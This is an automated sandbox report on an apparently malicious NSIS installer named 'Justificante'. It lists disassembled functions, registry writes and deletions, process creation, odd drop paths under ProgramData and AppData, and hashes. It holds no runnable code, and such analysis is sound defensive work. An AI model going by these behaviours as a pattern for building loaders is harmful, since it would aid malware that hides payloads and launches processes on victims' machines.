                          • Instruction Fuzzy Hash: BBF09076741204BFEB00CF59DD05E9EB7BCEBA1710F11803AFA05F7240E6B499648768

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 792 402e41-402e6a call 4063a9 794 402e6f-402e73 792->794 795 402f24-402f28 794->795 796 402e79-402e7d 794->796 797 402ea2-402eb5 796->797 798 402e7f-402ea0 RegEnumValueW 796->798 800 402ede-402ee5 RegEnumKeyW 797->800 798->797 799 402f09-402f17 RegCloseKey 798->799 799->795 801 402eb7-402eb9 800->801 802 402ee7-402ef9 RegCloseKey call 406931 800->802 801->799 803 402ebb-402ecf call 402e41 801->803 808 402f19-402f1f 802->808 809 402efb-402f07 RegDeleteKeyW 802->809 803->802 810 402ed1-402edd 803->810 808->795 809->795 810->800
                          APIs
                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CloseEnum$DeleteValue
                          • String ID:
                          • API String ID: 1354259210-0
                          • Opcode ID: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
                          • Instruction ID: 5acf5ff44325b65ef2d3dead3dbb76990f04c91a4d0d8f72c78c18ffef5b4167
                          • Opcode Fuzzy Hash: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
                          • Instruction Fuzzy Hash: 05215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11E0E7B48E54AAA8

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 811 402482-4024a9 call 402d3e * 2 call 402dce 817 4024ae-4024b3 811->817 818 402bc2-402bd1 817->818 819 4024b9-4024c3 817->819 820 4024c5-4024d2 call 402d3e lstrlenW 819->820 821 4024d6-4024d9 819->821 820->821 825 4024db-4024ec call 402d1c 821->825 826 4024ed-4024f0 821->826 825->826 827 402501-402515 RegSetValueExW 826->827 828 4024f2-4024fc call 403309 826->828 832 402517 827->832 833 40251a-4025fb RegCloseKey 827->833 828->827 832->833 833->818 836 402925-40292c 833->836 836->818
                          APIs
                          • lstrlenW.KERNEL32(C:\ProgramData\bestializing\slagtehuset.spo,00000023,00000011,00000002), ref: 004024CD
                          • RegSetValueExW.ADVAPI32(?,?,?,?,C:\ProgramData\bestializing\slagtehuset.spo,00000000,00000011,00000002), ref: 0040250D
                          • RegCloseKey.ADVAPI32(?,?,?,C:\ProgramData\bestializing\slagtehuset.spo,00000000,00000011,00000002), ref: 004025F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CloseValuelstrlen
                          • String ID: C:\ProgramData\bestializing\slagtehuset.spo
                          • API String ID: 2655323295-4256360445
                          • Opcode ID: 17c4465261820c4d01ba54f3f57b37a6feb17deab0db7c5e578ecccbb80d9823
                          • Instruction ID: c269879d92cf6aad1d98ff003e7813fc443ead00aa0a9254d290d0c4c068a2a6
                          • Opcode Fuzzy Hash: 17c4465261820c4d01ba54f3f57b37a6feb17deab0db7c5e578ecccbb80d9823
                          • Instruction Fuzzy Hash: 0311AF71E00108BEDB10AFA5DE49AAEBBB8EF44314F21443AF514F71D1D7B84D419628
                          APIs
                            • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,76F93420,?,76F92EE0,00405C6E,?,76F93420,76F92EE0,00000000), ref: 00405ECA
                            • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                            • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                            • Part of subcall function 00405A73: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer,?,00000000,000000F0), ref: 0040164D
                          Strings
                          • C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer, xrefs: 00401640
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                          • String ID: C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer
                          • API String ID: 1892508949-3767348336
                          • Opcode ID: 3cb5caa9db70481eff33ad3d530cfd1d90fdddaf7eee6b67ec42b11d2e186b9f
                          • Instruction ID: 804c449170a8270e91f9515fbcc2e09aef6974e60d9951be020b7c668b26977e
                          • Opcode Fuzzy Hash: 3cb5caa9db70481eff33ad3d530cfd1d90fdddaf7eee6b67ec42b11d2e186b9f
                          • Instruction Fuzzy Hash: 1511E231504115ABCF30AFA5CD4199F36B0EF24329B28493BE956B12F1D63E4E829F5E
                          APIs
                            • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                            • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,76F93420,?,76F92EE0,00405C6E,?,76F93420,76F92EE0,00000000), ref: 00405ECA
                            • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                            • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
                          • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405C6E,?,76F93420,76F92EE0,00000000), ref: 00405F72
                          • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405C6E,?,76F93420,76F92EE0), ref: 00405F82
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                          • String ID: P_B
                          • API String ID: 3248276644-906794629
                          • Opcode ID: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
                          • Instruction ID: 859fcd89679448da631e779a0da4808ed27405fda231041bc00783fb73730a7b
                          • Opcode Fuzzy Hash: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
                          • Instruction Fuzzy Hash: 5DF0F925115D2325D722333A5D09AAF1544CF92358B49013FF895F22C1DA3C8A13CDBE
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00405547
                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405598
                            • Part of subcall function 004044DE: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID:
                          • API String ID: 3748168415-3916222277
                          • Opcode ID: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
                          • Instruction ID: 7ed895885fecbfe1028844bafe119d46ede1b6e58bfeef0b35ccd3d75cf6e938
                          • Opcode Fuzzy Hash: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
                          • Instruction Fuzzy Hash: E60171B1200648BFDF208F11DD80A6B7726EB84755F244537FA007A1D4C77A8E529E59
                          APIs
                          • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,trikinse,?,?,00406699,80000002), ref: 00406450
                          • RegCloseKey.ADVAPI32(?,?,00406699,80000002,Software\Microsoft\Windows\CurrentVersion,trikinse,trikinse,trikinse,00000000,lgmnd), ref: 0040645B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID: trikinse
                          • API String ID: 3356406503-3397089422
                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                          • Instruction ID: f0f89c662eeec8a22638327002db2d2d8046b3273e4fa87c0bc9f0af31e9764c
                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                          • Instruction Fuzzy Hash: E1017172510209EBDF218F51CC05FDB3BB8EB54354F01403AFD55A2190D738D964DB94
                          APIs
                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 00405B4E
                          • CloseHandle.KERNEL32(?), ref: 00405B5B
                          Strings
                          • Error launching installer, xrefs: 00405B38
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: Error launching installer
                          • API String ID: 3712363035-66219284
                          • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                          • Instruction ID: 4727b597e06a80ccf73fde1317b74bfd1e446cf8a7cb79422ce9438d985acd26
                          • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                          • Instruction Fuzzy Hash: 2FE0B6B4A00209BFEB109B64ED49F7B7BBDEB04648F414465BD50F6190D778A8158A7C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
                          • Instruction ID: a7b8be33b9a7519416cae36d16977938a601532f9034d24a777c3823dc36e66c
                          • Opcode Fuzzy Hash: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
                          • Instruction Fuzzy Hash: F7A14571D04229CBDB28CFA8C854BADBBB1FF44305F14806ED856BB281D7786A86DF45
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
                          • Instruction ID: 5a24a20e97f266d7e3441ea32a969c72ce760fd7697c8a443cfa4f07d4855531
                          • Opcode Fuzzy Hash: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
                          • Instruction Fuzzy Hash: 6F911170D04229CBEF28CF98C854BADBBB1FB44305F14816ED856BB291C7786A86DF45
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
                          • Instruction ID: f684c89e7032feabc3e3bde7c6855c560f6d73b68505d9943badace2bdbe07f8
                          • Opcode Fuzzy Hash: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
                          • Instruction Fuzzy Hash: CD814771D04228CFDF24CFA8C944BADBBB1FB44305F25816AD856BB281C7786986DF05
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
                          • Instruction ID: 835433ef786a7bbaa66b5d31b28c9fa354c7a4a33243279710ed11147b04f42a
                          • Opcode Fuzzy Hash: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
                          • Instruction Fuzzy Hash: F1816871D04228CBDF24CFA8C844BAEBBB0FF44305F11816AD856BB281D7786986DF45
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
                          • Instruction ID: b4a429368d408adc735ccef7c69d02ca95e21b2dffe456e9be617d596e32585a
                          • Opcode Fuzzy Hash: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
                          • Instruction Fuzzy Hash: 44711371D04228CFDF28CFA8C954BADBBB1FB44305F15806AD856BB281D7386986DF45
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
                          • Instruction ID: ba5f555e51aa8b1381cdd2b0d2a1af6e0fef70f9c7cb40d8a5f6f768353cc961
                          • Opcode Fuzzy Hash: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
                          • Instruction Fuzzy Hash: 30713371E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786986DF45
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
                          • Instruction ID: ed69e48f2b9f224f5de76fa38221f26f69075a156c73166e2e17eecf637d197c
                          • Opcode Fuzzy Hash: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
                          • Instruction Fuzzy Hash: B1714671E04228CFDF28CF98C854BADBBB1FB44305F15806AD856B7281C7786946DF45
                          APIs
                          • GetTickCount.KERNEL32 ref: 00403425
                            • Part of subcall function 00403590: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 00403458
                          • SetFilePointer.KERNELBASE(002764B6,00000000,00000000,00414EF0,00004000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000), ref: 00403553
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: FilePointer$CountTick
                          • String ID:
                          • API String ID: 1092082344-0
